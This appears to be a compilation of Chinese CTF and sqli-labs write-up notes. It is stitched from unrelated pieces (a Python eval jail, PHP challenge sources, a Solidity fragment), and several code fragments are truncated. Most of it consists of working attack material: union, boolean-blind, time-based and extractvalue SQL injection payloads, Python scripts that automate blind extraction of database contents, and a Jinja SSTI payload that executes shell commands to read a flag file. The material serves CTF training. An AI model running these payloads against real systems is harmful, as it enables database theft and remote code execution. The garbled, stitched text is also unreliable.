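# Beginner "python jail" challenge source (reconstructed from a collapsed
# paste: `iflen` was `if len`, and `exit(0)` belongs to the `if` body —
# otherwise the program would always exit before evaluating anything).
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
# NOTE(review): `filter` here cannot be the builtin (which takes two
# arguments); presumably a filtering routine defined outside this excerpt.
filter(input_data)
if len(input_data) > 13:
    print("Oh hacker!")
    exit(0)
# SECURITY: eval() on raw user input executes arbitrary code. Neither the
# length cap nor the filter call above makes this safe; it is kept as-is
# because it is the challenge's own (deliberately vulnerable) source.
print('Answer: {}'.format(eval(input_data)))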
附: MySQL专有无select可用 MySQL 除了可以使用 select 查询表中的数据,也可使用 handler 语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler 语句并不具备 select 语句的所有功能。它是 MySQL 专用的语句,并没有包含到SQL标准中。handler 语句提供通往表的直接通道的存储引擎接口,可以用于 MyISAM 和 InnoDB 表。
也可以使用预编译转换成hex绕过
[SUCTF 2019]EasySQL
喜提fuzz脚本
# Fuzz driver from the writeup (reformatted from a collapsed paste; logic
# unchanged): POSTs each line of a wordlist as the `query` field and prints
# the stripped line when the response body contains 'Nonono'.
import requests

url = "http://7e692c90-6f0b-4aa3-babf-89bb436f6b4f.node4.buuoj.cn:81/"
with open('sql-fuzz.txt') as f:
    for line in f:
        # `line` is sent with its trailing newline; only the printed
        # copy is stripped.
        data = {"query": line}
        r = requests.post(url, data=data)
        if('Nonono' in r.text):
            print(line.strip(), end=" ")
http://0271ebd9-169b-4d78-8475-f6667e20789c.node4.buuoj.cn:81/check.php ?username=admin' and updatexml(1,concat(0x7e,(select substr((select password from l0ve1ysq1 where username='flag'),30,16)),0x7e),1) %23 &password=admin' and sleep(3)
[BJDCTF2020]Easy MD5
一眼丁真ffifdyop
绕过中一个奇妙的字符串
经过 md5 哈希后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b
用途:
select * from admin where password=''or'6<乱码>'
就相当于select * from admin where password=''or 1 实现sql注入
class Flag {  //flag.php
    public $file;

    // When the object is converted to a string and $file is set, the
    // contents of that file are echoed (followed by "<br>") and a fixed
    // marker string is returned; when $file is unset nothing is returned.
    public function __tostring() {
        if (isset($this->file)) {
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

// Abort when the raw query string matches the case-insensitive keyword /
// character blacklist below.
if($_SERVER) {
    if( preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']) )
        die('You seem to want to do something bad?');
}

// $file is taken from ?file= only when ?debu= matches /^aqua_is_cute$/ yet
// is not strictly identical to the literal 'aqua_is_cute'.  If that inner
// condition fails, $file stays unset for the file check further down.
if(!preg_match('/http|https/i', $_GET['file'])) {
    if(preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
        $file = $_GET["file"];
        echo "Neeeeee! Good Job!<br>";
    }
}
else die('fxck you! What do you want to do ?!');

// Every value collected in $_REQUEST must contain no ASCII letters.
if($_REQUEST) {
    foreach($_REQUEST as $value) {
        if(preg_match('/[a-zA-Z]/i', $value))
            die('fxck you! I hate English!');
    }
}

// The file named by $file must contain exactly 'debu_debu_aqua'.
if(file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

// NOTE(review): $shana and $passwd are not assigned anywhere in this
// excerpt — presumably populated earlier in the file; confirm against the
// full source.  The branch requires equal sha1 digests for two values that
// compare unequal with !=.  On success, extract() turns the keys of
// $_GET['flag'] into variables, which appears to be where $code and $arg
// below come from.
if( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?<br>";
}
else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

// Unless $code consists only of [a-z0-9] or $arg matches the blacklist,
// flag.php is included and $code is invoked as a function with '' and
// $arg as its arguments — a call through a request-controlled function
// name, which is the sink this challenge is built around.
if(preg_match('/^[a-z0-9]*$/isD', $code) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
    die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
}
else {
    include "flag.php";
    $code('', $arg);
}
?>
This is a very simple challenge andif you solve it I will give you a flag. Good Luck! Aqua is the cutest five-year-old child in the world! Isn't it ?
File "/app/app.py", line 35, in secret if(secret==None): return 'Tell me your secret.I will encrypt it so others can\'t see' rc=rc4_Modified.RC4("HereIsTreasure") #解密 deS=rc.do_crypt(secret) a=render_template_string(safe(deS)) if 'ciscn' in a.lower(): return 'flag detected!' Open an interactive python shell in this frame return
报错,能看源代码
之后便是ssti
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}
?id=-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 –+
数据库爆出来了,爆表名
?id=-1’ union select 1,(select group_concat(table_name) from information_schema.columns where table_schema=”security”),3 –+
表名出来了,爆字段
?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=”users”),3 –+
需要的数据都有了,咱可以直接把库给脱下来了
Less-2 - Less-4
这几题都一样,无非是注入点周围包裹的东西不一样,不多赘述,过。
Less-5 | 布尔盲注
?id=1
眉清目秀,啥都木有。
?id=1”‘ 一通测试下来,发现有了报错信息
如何利用报错信息注入呢?
?id=1’ and 1 = 1 –+ i
?id=2’ and 2 = 1 –+
那有意思的就来了,嘻嘻
mysql> select ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0); +-----------------------------------------------------------------------------------------------------+ | ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0) | +-----------------------------------------------------------------------------------------------------+ | 1 | +-----------------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec)
爆数据库
import requests
url = "http://39.104.82.167/Less-5/?id="
res = ""

# Boolean-based blind extraction loop from the writeup (reformatted from a
# collapsed paste; logic unchanged).  For each character position `j` and
# candidate byte value `k`, send the payload and append chr(k) to `res`
# when the "You are in..." marker appears in the response.
# The outer loop variable `i` is not referenced in the body, and `break`
# only leaves the innermost `k` loop.
for i in range(0, 256):
    for j in range(0, 256):
        for k in range(0, 256):
            payload = f"1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{j},1)) = {k} --+"
            r = requests.get(url + payload)
            if "You are in..........." in r.text:
                res += chr(k)
                print(res)
                break
更改payload来爆表
payload = f"1' and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=\"security\"),{j},1)) = {k} --+"
更改payload 来爆字段
payload = f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{j},1)) = {k} --+"
?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+
判断所有表名长度
?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+
逐一判断表名
?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+
判断所有字段名的长度
?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+
逐一判断字段名。
?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+
判断字段内容长度
?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0);
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname); fwrite($fp,'Password:'.$passwd."\n"); fclose($fp);
// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); //注意这里 $row = mysql_fetch_array($result);
// Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); }
// Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return$value; }
// take the variables
// (Reformatted from a collapsed paste; logic unchanged.)
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);

    // NOTE: $passwd is used raw — it is never passed through check_input()
    // and is later interpolated into the UPDATE statement below.
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        // String-built UPDATE with the unescaped $passwd; the database
        // error text, if any, is printed back to the response below.
        // A parameterized statement would remove both the injection
        // point and the error disclosure.
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg" />';
        echo "</font>";
    }
}
1’ and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本
1’ and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆数据库
1’ and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名
1’ and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),0x5c)))# 爆字段名
1’ and (extractvalue(1,concat(0x5c,(select password from (select password from users where username=’admin1’) b) ,0x5c)))# 爆字段内容该格式针对mysql数据库。
1’ and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段内容。
// string public constant name = 'NaughtCoin'; // string public constant symbol = '0x0'; // uint public constant decimals = 18; uint public timeLock = now + 10 * 365 days; uint256 public INITIAL_SUPPLY; address public player;